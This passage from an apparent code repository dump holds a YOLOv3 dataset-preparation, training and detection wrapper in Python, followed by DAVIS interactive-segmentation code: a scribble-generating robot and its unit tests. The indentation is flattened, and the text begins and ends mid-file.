tv = int(num * trainval_percent)
tr = int(tv * train_percent)
trainval = random.sample(list, tv)
train = random.sample(trainval, tr)
ftrainval = open(txtsavepath+'/trainval.txt', 'w')
ftest = open(txtsavepath+'/test.txt', 'w')
ftrain = open(txtsavepath+'/train.txt', 'w')
fval = open(txtsavepath+'/val.txt', 'w')
for i in list:
name = total_xml[i][:-4] + '\n'
if i in trainval:
ftrainval.write(name)
if i in train:
ftest.write(name)
else:
fval.write(name)
else:
ftrain.write(name)
ftrainval.close()
ftrain.close()
fval.close()
ftest.close()
def convert(self,size, box):
dw = 1. / size[0]
dh = 1. / size[1]
x = (box[0] + box[1]) / 2.0
y = (box[2] + box[3]) / 2.0
w = box[1] - box[0]
h = box[3] - box[2]
x = x * dw
w = w * dw
y = y * dh
h = h * dh
return (x, y, w, h)
def convert_annotation(self,image_id):
in_file = open(self.xmlpath+'/%s.xml' % (image_id))
out_file = open(self.labelspath+'/%s.txt' % (image_id), 'w')
tree = ET.parse(in_file)
root = tree.getroot()
size = root.find('size')
w = int(size.find('width').text)
h = int(size.find('height').text)
for obj in root.iter('object'):
# difficult = obj.find('difficult').text #2020_2_6
cls = obj.find('name').text
#if cls not in self.classes or int(difficult) == 1:
if cls not in self.classes:
continue
cls_id = self.classes.index(cls)
xmlbox = obj.find('bndbox')
b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text),
float(xmlbox.find('ymax').text))
bb = self.convert((w, h), b)
out_file.write(str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n')
def voc_label_make(self):
wd = getcwd()
#print(wd)
for image_set in self.sets:
if not os.path.exists(self.labelspath+'/'):
os.makedirs(self.labelspath+'/')
image_ids = open(self.setspath+'/%s.txt' % (image_set)).read().strip().split()
list_file = open(self.datapath+'/%s.txt' % (image_set), 'w')
for image_id in image_ids:
list_file.write(self.imgspath+'/%s.jpg\n' % (image_id))
self.convert_annotation(image_id)
list_file.close()
def clear_data(self,is_all=False):
if is_all==True:
shutil.rmtree(self.datapath)
os.mkdir(self.datapath)
os.mkdir(self.datapath+'\Annotations')
os.mkdir(self.datapath+'\images')
os.mkdir(self.datapath+'\ImageSets')
os.mkdir(self.datapath+'\labels')
else:
for i in glob(self.datapath+'/*.txt'):
os.remove(i)
for i in glob(self.datapath+'/*.names'):
os.remove(i)
for i in glob(self.datapath+'/*.data'):
os.remove(i)
for i in glob(self.labelspath+'/*.txt'):
os.remove(i)
for i in glob(self.setspath+'/*.txt'):
os.remove(i)
os.remove(self.datapath+'/pics.shapes')
class ObjDetect_train(object):
def __init__(self,currentpath):
# self.hyperparameters: train.py --evolve --epochs 2 --img-size 320, Metrics: 0.204 0.302 0.175 0.234 (square smart)
self.hyp = {'xy': 0.1, # xy loss gain (giou is about 0.02)
'wh': 0.1, # wh loss gain
'cls': 0.04, # cls loss gain
'conf': 4.5, # conf loss gain
'iou_t': 0.5, # iou target-anchor training threshold
'lr0': 0.001, # initial learning rate
'lrf': -4., # final learning rate = lr0 * (10 ** lrf)
'momentum': 0.90, # SGD momentum
'weight_decay': 0.0005} # optimizer weight decay
#default:
self.currentpath=currentpath
self.global_epochs=68
self.global_batch_size=8
self.global_accumulate=8
self.global_cfg=currentpath+'/cfgs/yolov3-spp.cfg'
self.global_data_cfg=currentpath+'/data/global_config.data'
self.global_multi_scale=False
self.global_img_size=416
self.global_resume=False
self.global_transfer=False
self.global_num_workers=4
self.global_backend='ncll'
self.global_nosave=False
self.global_notest=False
self.global_evolve=False
self.global_var=0
self.Outputpath=self.currentpath+'/weights/'
self.weightspath=self.currentpath+'/weights/'
self.device= torch_utils.select_device()
def rawtrain(self,
cfg,
data_cfg,
img_size=416,
resume=False,
epochs=100, # 500200 batches at bs 4, 117263 images = 68 epochs
batch_size=16,
accumulate=4, # effective bs = 64 = batch_size * accumulate
freeze_backbone=False,
transfer=False # Transfer learning (train only YOLO layers)
):
self.rect=False
if isinstance(img_size,int):
self.rect=False
else:
self.rect=True
init_seeds()
weights = self.weightspath
output=self.Outputpath
latest = output + 'latest.pth'
best = output + 'best.pth'
torch.backends.cudnn.benchmark = True # possibly unsuitable for multiscale
img_size_test = img_size # image size for testing
if self.global_multi_scale:
img_size_min = round(img_size / 32 / 1.5)
img_size_max = round(img_size / 32 * 1.5)
img_size = img_size_max * 32 # initiate with maximum multi_scale size
# Configure run
data_dict = parse_data_cfg(data_cfg)
train_path = data_dict['train']
nc = int(data_dict['classes']) # number of classes
# Initialize model
model = Darknet(cfg).to(self.device)
# Optimizer
optimizer = optim.SGD(model.parameters(), lr=self.hyp['lr0'], momentum=self.hyp['momentum'], weight_decay=self.hyp['weight_decay'])
cutoff = -1 # backbone reaches to cutoff layer
start_epoch = 0
best_loss = float('inf')
nf = int(model.module_defs[model.yolo_layers[0] - 1]['filters']) # yolo layer size (i.e. 255)
##################################################################################################
if resume: # Load previously saved model
if transfer: # Transfer learning
chkpt = torch.load(weights + 'yolov3-spp.pth', map_location=self.device)
model.load_state_dict({k: v for k, v in chkpt['model'].items() if v.numel() > 1 and v.shape[0] != 255},
strict=False)
for p in model.parameters():
p.requires_grad = True if p.shape[0] == nf else False
else: # resume from latest.pth
chkpt = torch.load(latest, map_location=self.device) # load checkpoint
model.load_state_dict(chkpt['model'])
start_epoch = chkpt['epoch'] + 1
if chkpt['optimizer'] is not None:
optimizer.load_state_dict(chkpt['optimizer'])
best_loss = chkpt['best_loss']
del chkpt
else: # Initialize model with backbone (optional)
if '-tiny.cfg' in cfg:
cutoff = load_darknet_weights(model, weights + 'yolov3-tiny.weights')
elif '-spp.cfg' in cfg:
cutoff = load_darknet_weights(model, weights + 'yolov3-spp.weights')
elif 'v3.cfg' in cfg:
cutoff = load_darknet_weights(model, weights + 'yolov3.weights')
# scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[round(self.global_epochs * x) for x in (0.8, 0.9)], gamma=0.1)
scheduler.last_epoch = start_epoch - 1
# Dataset
dataset = LoadImagesAndLabels(train_path,
img_size,
batch_size,
augment=True,
rect=self.rect)
# Dataloader
dataloader = DataLoader(dataset,
batch_size=batch_size,
num_workers=self.global_num_workers,
shuffle=True, # disable rectangular training if True
pin_memory=True,
collate_fn=dataset.collate_fn)
mixed_precision = False
if mixed_precision:
from apex import amp
model, optimizer = amp.initialize(model, optimizer, opt_level='O1')
# Remove old results
for f in glob('*_batch*.jpg') + glob('results.txt'):
os.remove(f)
# Start training
model.hyp = self.hyp # attach self.hyperparameters to model
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(self.device) # attach class weights
model_info(model)
nb = len(dataloader)
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0) # P, R, mAP, F1, test_loss
n_burnin = min(round(nb / 5 + 1), 1000) # burn-in batches
t, t0 = time.time(), time.time()
Endepoch=0
for epoch in range(start_epoch, epochs):
model.train()
print(('\n%8s%12s' + '%10s' * 7) % ('Epoch', 'Batch', 'xy', 'wh', 'conf', 'cls', 'total', 'targets', 'time'))
# Update scheduler
scheduler.step()
# Freeze backbone at epoch 0, unfreeze at epoch 1 (optional)
if freeze_backbone and epoch < 2:
for name, p in model.named_parameters():
if int(name.split('.')[1]) < cutoff: # if layer < 75
p.requires_grad = False if epoch == 0 else True
# # Update image weights (optional)
# w = model.class_weights.cpu().numpy() * (1 - maps) # class weights
# image_weights = labels_to_image_weights(dataset.labels, nc=nc, class_weights=w)
# dataset.indices = random.choices(range(dataset.n), weights=image_weights, k=dataset.n) # random weighted index
mloss = torch.zeros(5).to(self.device) # mean losses
for i, (imgs, targets, _, _) in enumerate(dataloader):
imgs = imgs.to(self.device)
targets = targets.to(self.device)
# Multi-Scale training
if self.global_multi_scale:
if (i + 1 + nb * epoch) % 10 == 0: # adjust (67% - 150%) every 10 batches
img_size = random.choice(range(img_size_min, img_size_max + 1)) * 32
print('img_size = %g' % img_size)
scale_factor = img_size / max(imgs.shape[-2:])
imgs = F.interpolate(imgs, scale_factor=scale_factor, mode='bilinear', align_corners=False)
# Plot images with bounding boxes
if i == (len(dataloader)-1):
plot_images(imgs=imgs, targets=targets, fname='{}train_batch{}.jpg'.format(epoch,i))
# SGD burn-in
if epoch == 0 and i <= n_burnin:
lr = self.hyp['lr0'] * (i / n_burnin) ** 4
for x in optimizer.param_groups:
x['lr'] = lr
# Run model
pred = model(imgs)
# Compute loss
loss, loss_items = compute_loss(pred, targets, model)
if torch.isnan(loss):
print('WARNING: nan loss detected, ending training')
return results
# Compute gradient
if mixed_precision:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
# Accumulate gradient for x batches before optimizing
if (i + 1) % accumulate == 0 or (i + 1) == nb:
optimizer.step()
optimizer.zero_grad()
# Print batch results
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
s = ('%8s%12s' + '%10.3g' * 7) % (
'%g/%g' % (epoch, epochs - 1),
'%g/%g' % (i, nb - 1), *mloss, len(targets), time.time() - t)
t = time.time()
print(s)
# Calculate mAP (always test final epoch, skip first 5 if self.global_nosave)
if not (self.global_notest or (self.global_nosave and epoch < 10)) or epoch == epochs - 1:
with torch.no_grad():
results, maps = test(cfg, data_cfg, batch_size=batch_size, img_size=img_size_test, model=model,
conf_thres=0.1)
# Write epoch results
with open('results.txt', 'a') as file:
file.write(s + '%11.3g' * 5 % results + '\n') # P, R, mAP, F1, test_loss
# Update best loss
test_loss = results[4]
if test_loss < best_loss:
best_loss = test_loss
# Save training results
save = (not self.global_nosave) or (epoch == epochs - 1)
if save:
# Create checkpoint
chkpt = {'epoch': epoch,
'best_loss': best_loss,
'model': model.module.state_dict() if type(
model) is nn.parallel.DistributedDataParallel else model.state_dict(),
'optimizer': optimizer.state_dict()}
# Save latest checkpoint
torch.save(chkpt, latest)
# Save best checkpoint
if best_loss == test_loss:
torch.save(chkpt, best)
# Save backup every 10 epochs (optional)
if epoch > 0 and epoch % 10 == 0:
torch.save(chkpt, weights + 'backup%g.pth' % epoch)
# Delete checkpoint
del chkpt
Endepoch=epoch
dt = (time.time() - t0) / 3600
print('%g epochs completed in %.3f hours.' % (Endepoch - start_epoch + 1, dt))
return results
def print_mutation(self,hyp,results):
# Write mutation results
a = '%11s' * len(hyp) % tuple(hyp.keys()) # self.hyperparam keys
b = '%11.4g' * len(hyp) % tuple(hyp.values()) # self.hyperparam values
c = '%11.3g' * len(results) % results # results (P, R, mAP, F1, test_loss)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
with open('evolve.txt', 'a') as f:
f.write(c + b + '\n')
def Run(self,
epochs=68,
batch_size=8,
accumulate=8,
cfg='yolov3-spp.cfg',
multi_scale=False,
img_size=416,
resume=False,
transfer=False,
num_workers=4,
backend='ncll',
nosave=False,
notest=False,
evolve=False,
var=0
):
self.global_epochs=epochs
self.global_batch_size=batch_size
self.global_accumulate=accumulate
self.global_cfg=self.currentpath+'/cfgs/'+cfg
self.global_multi_scale=multi_scale
self.global_img_size=img_size
self.global_resume=resume
self.global_transfer=transfer
self.global_num_workers=num_workers
self.global_backend=backend
self.global_nosave=nosave
self.global_notest=notest
self.global_evolve=evolve
self.global_var=var
if self.global_evolve:
self.global_notest = True # save time by only testing final epoch
self.global_nosave = True # do not save checkpoints
# Train
results = self.rawtrain(
self.global_cfg,
self.global_data_cfg,
img_size=self.global_img_size,
resume=self.global_resume or self.global_transfer,
transfer=self.global_transfer,
epochs=self.global_epochs,
batch_size=self.global_batch_size,
accumulate=self.global_accumulate
)
# Evolve self.hyperparameters (optional)
if self.global_evolve:
best_fitness = results[2] # use mAP for fitness
# Write mutation results
self.print_mutation(self.hyp, results)
gen = 1000 # generations to evolve
for _ in range(gen):
# Mutate self.hyperparameters
old_hyp = self.hyp.copy()
init_seeds(seed=int(time.time()))
s = [.3, .3, .3, .3, .3, .3, .3, .03, .3] # xy, wh, cls, conf, iou_t, lr0, lrf, momentum, weight_decay
for i, k in enumerate(self.hyp.keys()):
x = (np.random.randn(1) * s[i] + 1) ** 1.1 # plt.hist(x.ravel(), 100)
self.hyp[k] = self.hyp[k] * float(x) # vary by about 30% 1sigma
# Clip to limits
keys = ['lr0', 'iou_t', 'momentum', 'weight_decay']
limits = [(1e-4, 1e-2), (0, 0.90), (0.70, 0.99), (0, 0.01)]
for k, v in zip(keys, limits):
self.hyp[k] = np.clip(self.hyp[k], v[0], v[1])
# Determine mutation fitness
results = train(
self.global_cfg,
self.global_data_cfg,
img_size=self.global_img_size,
resume=self.global_resume or self.global_transfer,
transfer=self.global_transfer,
epochs=self.global_epochs,
batch_size=self.global_batch_size,
accumulate=self.global_accumulate
)
mutation_fitness = results[2]
# Write mutation results
self.print_mutation(self.hyp, results)
# Update self.hyperparameters if fitness improved
if mutation_fitness > best_fitness:
# Fitness improved!
print('Fitness improved!')
best_fitness = mutation_fitness
else:
self.hyp = old_hyp.copy() # reset self.hyp to
class ObjDetect_detect(object):
def __init__(self,cfg,currentpath='',img_size=416):
self.currentpath=currentpath
self.cfg=currentpath+'/cfgs/'+cfg
self.data_cfg=currentpath+'/data/global_config.data'
self.device= torch_utils.select_device()
# Initialize model
self.model = Darknet(self.cfg, img_size)
# Load weights
self.weightspath=currentpath+'/weights/best.pth'
'''
if '-tiny.cfg' in cfg:
self.weightspath=currentpath+'/weights/' + 'yolov3-tiny.weights'
elif '-spp.cfg' in cfg:
self.weightspath=currentpath+'/weights/' + 'yolov3-spp.weights'
elif 'v3.cfg' in cfg:
self.weightspath=currentpath+'/weights/'+ 'yolov3.weights'
'''
self.model.load_state_dict(torch.load(self.weightspath, map_location=self.device)['model'])
# Fuse Conv2d + BatchNorm2d layers
self.model.fuse()
# Eval mode
self.model.to(self.device).eval()
def detect_from_RGBimg(self,
img,
img_size_hw=(416,416), #hw
conf_thres=0.5,
nms_thres=0.5,
is_showPreview=False,
log_print=False):
#img=img.resize((img_size_hw[1],img_size_hw[0]),Image.ANTIALIAS) #resize
img=np.array(img,dtype=np.uint8) #change numpy array
model=self.model
classes = load_classes(parse_data_cfg(self.data_cfg)['names'])
colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(classes))]
im0=img.copy() # copy raw RGB
#print(img.shape)
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
img = torch.from_numpy(img).unsqueeze(0).to(self.device) # add dim and change to float
#print(img.shape)
img=img.permute(0,3,1,2) # dims change positions
#print(img.shape)
pred, _ = model(img)
det = non_max_suppression(pred, conf_thres, nms_thres)[0]
t = time.time()
result_boxes=[]
if det is not None and len(det) > 0:
# Rescale boxes from 416 to true image size
det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()
# Print results to screen
#print('%gx%g ' % img.shape[2:], end='') # print image size
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum()
if log_print:
print('%g %s\n' % (n, classes[int(c)]))
sp='%g'%(n)
# Draw bounding boxes and labels of detections
for *xyxy, conf, cls_conf, cls in det:
#print(cls_conf)
# Add bbox to the image
label = '%s' % (classes[int(cls)])
c1, c2 = (int(xyxy[0]), int(xyxy[1])), (int(xyxy[2]), int(xyxy[3]))
if log_print:
print("find:x[%d %d],y[%d %d]"%(c1[0],c2[0],c1[1],c2[1]))
plot_one_box(xyxy, im0, label=label, color=colors[int(cls)])
box={'class':classes[int(cls)],'x0':c1[0],'x1':c2[0],'y0':c1[1],'y1':c2[1]}
result_boxes.append(box)
if log_print:
print('Done. (%.3fs)' % (time.time() - t))
if is_showPreview: # Save image with detections
im0[:,:,(0,1,2)]=im0[:,:,(2,1,0)]#通道转换
cv2.imshow('PreviewDetect',im0)
cv2.waitKey(0)
#im0[:,:,(0,1,2)]=im0[:,:,(2,1,0)]#通道转换
return result_boxes,im0
```
#### File: Seg/davisinteractive/logging_test.py
```python
import unittest
from davisinteractive import logging
class TestLogging:
def test_level(self, caplog):
logging.set_verbosity(logging.WARN)
logging.info('Test info')
assert not caplog.records
logging.warning('Test warn')
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelname == 'WARNING'
assert record.msg == 'Test warn'
def test_verbose(self, caplog):
logging.set_verbosity(logging.WARN)
logging.verbose('Test verbose')
assert not caplog.records
logging.set_verbosity(logging.INFO)
logging.verbose('Test verbose')
assert len(caplog.records) == 1
record = caplog.records[0]
assert record.levelname == 'INFO'
assert record.msg == 'Test verbose'
caplog.clear()
logging.set_info_level(1)
logging.verbose('Test verbose 2', 2)
assert not caplog.records
```
#### File: davisinteractive/robot/interactive_robot.py
```python
from __future__ import absolute_import, division
import time
import networkx as nx
import numpy as np
from scipy.ndimage import binary_dilation, binary_erosion
from scipy.special import comb
from skimage.filters import rank
from skimage.morphology import dilation, disk, erosion, medial_axis
from sklearn.neighbors import radius_neighbors_graph
from .. import logging
from ..metrics import batched_jaccard
from ..utils.operations import bezier_curve
__all__ = ['InteractiveScribblesRobot']
class InteractiveScribblesRobot(object):
""" Robot that generates realistic scribbles simulating human interaction.
# Attributes
kernel_size: Float. Fraction of the square root of the area used
to compute the dilation and erosion before computing the
skeleton of the error masks.
max_kernel_radius: Float. Maximum kernel radius when applying
dilation and erosion. Default 16 pixels.
min_nb_nodes: Integer. Number of nodes necessary to keep a connected
graph and convert it into a scribble.
nb_points: Integer. Number of points to sample the bezier curve
when converting the final paths into curves.
"""
def __init__(self,
kernel_size=.15,
max_kernel_radius=16,
min_nb_nodes=4,
nb_points=1000):
""" Robot constructor
"""
if kernel_size >= 1. or kernel_size < 0:
raise ValueError('kernel_size must be a value between [0, 1).')
self.kernel_size = kernel_size
self.max_kernel_radius = max_kernel_radius
self.min_nb_nodes = min_nb_nodes
self.nb_points = nb_points
def _generate_scribble_mask(self, mask):
""" Generate the skeleton from a mask
Given an error mask, the medial axis is computed to obtain the
skeleton of the objects. In order to obtain smoother skeleton and
remove small objects, an erosion and dilation operations are performed.
The kernel size used is proportional the squared of the area.
# Arguments
mask: Numpy Array. Error mask
Returns:
skel: Numpy Array. Skeleton mask
"""
mask = np.asarray(mask, dtype=np.uint8)
side = np.sqrt(np.sum(mask > 0))
mask_ = mask
# kernel_size = int(self.kernel_size * side)
kernel_radius = self.kernel_size * side * .5
kernel_radius = min(kernel_radius, self.max_kernel_radius)
logging.verbose(
'Erosion and dilation with kernel radius: {:.1f}'.format(
kernel_radius), 2)
compute = True
while kernel_radius > 1. and compute:
kernel = disk(kernel_radius)
mask_ = rank.minimum(mask.copy(), kernel)
mask_ = rank.maximum(mask_, kernel)
compute = False
if mask_.astype(np.bool).sum() == 0:
compute = True
prev_kernel_radius = kernel_radius
kernel_radius *= .9
logging.verbose('Reducing kernel radius from {:.1f} '.format(
prev_kernel_radius) +
'pixels to {:.1f}'.format(kernel_radius), 1)
mask_ = np.pad(
mask_, ((1, 1), (1, 1)), mode='constant', constant_values=False)
skel = medial_axis(mask_.astype(np.bool))
skel = skel[1:-1, 1:-1]
return skel
def _mask2graph(self, skeleton_mask):
""" Transforms a skeleton mask into a graph
Args:
skeleton_mask (ndarray): Skeleton mask
Returns:
tuple(nx.Graph, ndarray): Returns a tuple where the first element
is a Graph and the second element is an array of xy coordinates
indicating the coordinates for each Graph node.
If an empty mask is given, None is returned.
"""
mask = np.asarray(skeleton_mask, dtype=np.bool)
if np.sum(mask) == 0:
return None
h, w = mask.shape
x, y = np.arange(w), np.arange(h)
X, Y = np.meshgrid(x, y)
X, Y = X.ravel(), Y.ravel()
M = mask.ravel()
X, Y = X[M], Y[M]
points = np.c_[X, Y]
G = radius_neighbors_graph(points, np.sqrt(2), mode='distance')
T = nx.from_scipy_sparse_matrix(G)
return T, points
def _acyclics_subgraphs(self, G):
""" Divide a graph into connected components subgraphs
Divide a graph into connected components subgraphs and remove its
cycles removing the edge with higher weight inside the cycle. Also
prune the graphs by number of nodes in case the graph has not enought
nodes.
Args:
G (nx.Graph): Graph
Returns:
list(nx.Graph): Returns a list of graphs which are subgraphs of G
with cycles removed.
"""
if not isinstance(G, nx.Graph):
raise TypeError('G must be a nx.Graph instance')
S = [] # List of subgraphs of G
for c in nx.connected_components(G):
g = G.subgraph(c).copy()
# Remove all cycles that we may find
has_cycles = True
while has_cycles:
try:
cycle = nx.find_cycle(g)
weights = np.asarray([G[u][v]['weight'] for u, v in cycle])
idx = weights.argmax()
# Remove the edge with highest weight at cycle
g.remove_edge(*cycle[idx])
except nx.NetworkXNoCycle:
has_cycles = False
if len(g) < self.min_nb_nodes:
# Prune small subgraphs
logging.verbose('Remove a small line with {} nodes'.format(
len(g)), 1)
continue
S.append(g)
return S
def _longest_path_in_tree(self, G):
""" Given a tree graph, compute the longest path and return it
Given an undirected tree graph, compute the longest path and return it.
The approach use two shortest path transversals (shortest path in a
tree is the same as longest path). This could be improve but would
require implement it:
https://cs.stackexchange.com/questions/11263/longest-path-in-an-undirected-tree-with-only-one-traversal
Args:
G (nx.Graph): Graph which should be an undirected tree graph
Returns:
list(int): Returns a list of indexes of the nodes belonging to the
longest path.
"""
if not isinstance(G, nx.Graph):
raise TypeError('G must be a nx.Graph instance')
if not nx.is_tree(G):
raise ValueError('Graph G must be a tree (graph without cycles)')
# Compute the furthest node to the random node v
v = list(G.nodes())[0]
distance = nx.single_source_shortest_path_length(G, v)
vp = max(distance.items(), key=lambda x: x[1])[0]
# From this furthest point v' find again the longest path from it
distance = nx.single_source_shortest_path(G, vp)
longest_path = max(distance.values(), key=len)
# Return the longest path
return list(longest_path)
def interact(self,
sequence,
pred_masks,
gt_masks,
nb_objects=None,
frame=None):
""" Interaction of the Scribble robot given a prediction.
Given the sequence and a mask prediction, the robot will return a
scribble in the region that fails the most.
# Arguments
sequence: String. Name of the sequence to interact with.
pred_masks: Numpy Array. Array with the prediction masks. It must
be an integer array with shape (B x H x W), with B being the number
of frames of the sequence.
gt_masks: Numpy Array. Array with the ground truth of the sequence.
It must have the same data type and shape as `pred_masks`.
nb_objects: Integer. Number of objects in the ground truth mask. If
`None` the value will be infered from `y_true`. Setting this
value will speed up the computation.
frame: Integer. Frame to generate the scribble. If not given, the
worst frame given by the jaccard will be used.
# Returns
dict: Return a scribble (default representation).
"""
robot_start = time.time()
predictions = np.asarray(pred_masks, dtype=np.int)
annotations = np.asarray(gt_masks, dtype=np.int)
nb_frames = len(annotations)
if nb_objects is None:
obj_ids = np.unique(annotations)
obj_ids = obj_ids[(obj_ids > 0) & (obj_ids < 255)]
nb_objects = len(obj_ids)
obj_ids = [i for i in range(nb_objects + 1)]
# Infer height and width of the sequence
h, w = annotations.shape[1:3]
img_shape = np.asarray([w, h], dtype=np.float)
if frame is None:
jac = batched_jaccard(
annotations, predictions, nb_objects=nb_objects)
worst_frame = jac.argmin()
logging.verbose(
'For sequence {} the worst frames is #{} with Jaccard: {:.3f}'.
format(sequence, worst_frame, jac.min()), 2)
else:
worst_frame = frame
pred, gt = predictions[worst_frame], annotations[worst_frame]
scribbles = [[] for _ in range(nb_frames)]
for obj_id in obj_ids:
logging.verbose(
'Creating scribbles from error mask at object_id={}'.format(
obj_id), 2)
start_time = time.time()
error_mask = (gt == obj_id) & (pred != obj_id)
if error_mask.sum() == 0:
logging.info(
'Error mask of object ID {} is empty. Skip object ID.'.
format(obj_id))
continue
# Generate scribbles
skel_mask = self._generate_scribble_mask(error_mask)
skel_time = time.time() - start_time
logging.verbose(
'Time to compute the skeleton mask: {:.3f} ms'.format(
skel_time * 1000), 2)
if skel_mask.sum() == 0:
continue
G, P = self._mask2graph(skel_mask)
mask2graph_time = time.time() - start_time - skel_time
logging.verbose(
'Time to transform the skeleton mask into a graph: ' +
'{:.3f} ms'.format(mask2graph_time * 1000), 2)
t_start = time.time()
S = self._acyclics_subgraphs(G)
t = (time.time() - t_start) * 1000
logging.verbose(
'Time to split into connected components subgraphs ' +
'and remove the cycles: {:.3f} ms'.format(t), 2)
t_start = time.time()
longest_paths_idx = [self._longest_path_in_tree(s) for s in S]
longest_paths = [P[idx] for idx in longest_paths_idx]
t = (time.time() - t_start) * 1000
logging.verbose(
'Time to compute the longest path on the trees: {:.3f} ms'.
format(t), 2)
t_start = time.time()
scribbles_paths = [
bezier_curve(p, self.nb_points) for p in longest_paths
]
t = (time.time() - t_start) * 1000
logging.verbose(
'Time to compute the bezier curves: {:.3f} ms'.format(t), 2)
end_time = time.time()
logging.verbose(
'Generating the scribble for object id {} '.format(obj_id) +
'took {:.3f} ms'.format((end_time - start_time) * 1000), 2)
# Generate scribbles data file
for p in scribbles_paths:
p /= img_shape
path_data = {
'path': p.tolist(),
'object_id': int(obj_id),
'start_time': start_time,
'end_time': end_time
}
scribbles[worst_frame].append(path_data)
scribbles_data = {'scribbles': scribbles, 'sequence': sequence}
t = time.time() - robot_start
logging.info(('The robot took {:.3f} s to generate all the '
'scribbles for {} objects. Sequence {}.').format(
t, nb_objects, sequence))
return scribbles_data
```
#### File: davisinteractive/robot/interactive_robot_test.py
```python
from __future__ import absolute_import, division
import json
import unittest
import networkx as nx
import numpy as np
import pytest
from davisinteractive.robot import InteractiveScribblesRobot
from davisinteractive.utils.scribbles import annotated_frames, is_empty
class TestInteractiveScribblesRobot(unittest.TestCase):
def test_generate_scribble_mask_empty(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
robot = InteractiveScribblesRobot()
skel = robot._generate_scribble_mask(empty_mask)
assert skel.shape == empty_mask.shape
assert np.all(skel == empty_mask)
def test_generate_scribble_mask(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
squared_mask = empty_mask.copy()
squared_mask[50:100, 100:150] = True
robot = InteractiveScribblesRobot()
skel_squared = robot._generate_scribble_mask(squared_mask)
assert skel_squared.shape == empty_mask.shape
assert np.sum(skel_squared) > 0
def test_mask2graph_empty(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
robot = InteractiveScribblesRobot()
out = robot._mask2graph(empty_mask)
assert out is None
def test_mask2graph(self):
empty_mask = np.zeros((100, 200), dtype=np.bool)
squared_mask = empty_mask.copy()
squared_mask[50:100, 100:150] = True
robot = InteractiveScribblesRobot()
out = robot._mask2graph(squared_mask)
assert isinstance(out, tuple)
assert len(out) == 2
G, T = out
assert isinstance(G, nx.Graph)
assert isinstance(T, np.ndarray)
assert T.dtype == np.int
assert len(G) == len(T)
T_x, T_y = T.T
assert T_x.min() >= 0
assert T_x.max() < 200
assert T_y.min() >= 0
assert T_y.max() < 100
def test_interaction_no_class(self):
gt_empty = np.zeros((10, 300, 500), dtype=np.int)
robot = InteractiveScribblesRobot()
with pytest.raises(ValueError):
robot.interact('test', gt_empty.copy(), gt_empty)
def test_interaction_equal(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
gt_empty[0, 100:200, 100:200] = 1
pred_empty = gt_empty.copy()
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert is_empty(scribble)
assert annotated_frames(scribble) == []
assert len(scribble['scribbles']) == nb_frames
def test_interaction(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = gt_empty.copy()
gt_empty[5, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert not is_empty(scribble)
assert annotated_frames(scribble) == [5]
assert len(scribble['scribbles']) == nb_frames
lines = scribble['scribbles'][5]
for l in lines:
assert l['object_id'] == 1
path = np.asarray(l['path'])
x, y = path[:, 0], path[:, 1]
assert np.all((x >= .2) & (x <= .4))
assert np.all((y >= 1 / 3) & (y <= 2 / 3))
def test_scribble_json_serializer(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = gt_empty.copy()
gt_empty[5, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
json.JSONEncoder().encode(scribble)
def test_interaction_false_positive(self):
nb_frames, h, w = 10, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = np.ones((nb_frames, h, w), dtype=np.int)
gt_empty[5, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert not is_empty(scribble)
assert annotated_frames(scribble) == [0]
assert len(scribble['scribbles']) == nb_frames
lines = scribble['scribbles'][0]
assert lines
for l in lines:
assert l['object_id'] == 0
path = np.asarray(l['path'])
x, y = path[:, 0], path[:, 1]
assert np.all((x >= 0) & (x <= 1))
assert np.all((y >= 0) & (y <= 1))
def test_interaction_false_positive_single_frame(self):
nb_frames, h, w = 1, 300, 500
gt_empty = np.zeros((nb_frames, h, w), dtype=np.int)
pred_empty = np.ones((nb_frames, h, w), dtype=np.int)
gt_empty[0, 100:200, 100:200] = 1
robot = InteractiveScribblesRobot()
scribble = robot.interact('test', pred_empty, gt_empty)
assert not is_empty(scribble)
assert annotated_frames(scribble) == [0]
assert len(scribble['scribbles']) == nb_frames
lines = scribble['scribbles'][0]
assert lines
for l in lines:
assert l['object_id'] == 0
path = np.asarray(l['path'])
x, y = path[:, 0], path[:, 1]
inside = (x >= .2) & (x <= .4) & (y >= 1 / 3) & (y <= 2 / 3)
assert not np.any(inside)
```
#### File: davisinteractive/session/session_test.py
```python
from __future__ import absolute_import, division
import json
import os
import tempfile
import time
import unittest
from functools import wraps
import numpy as np
import pandas as pd
import pytest
from davisinteractive.common import Path, patch
from davisinteractive.connector.local import LocalConnector
from davisinteractive.dataset import Davis
from davisinteractive.session import DavisInteractiveSession
from davisinteractive.utils.scribbles import annotated_frames, is_empty
EMPTY_SCRIBBLE = {
'scribbles': [[] for _ in range(69)],
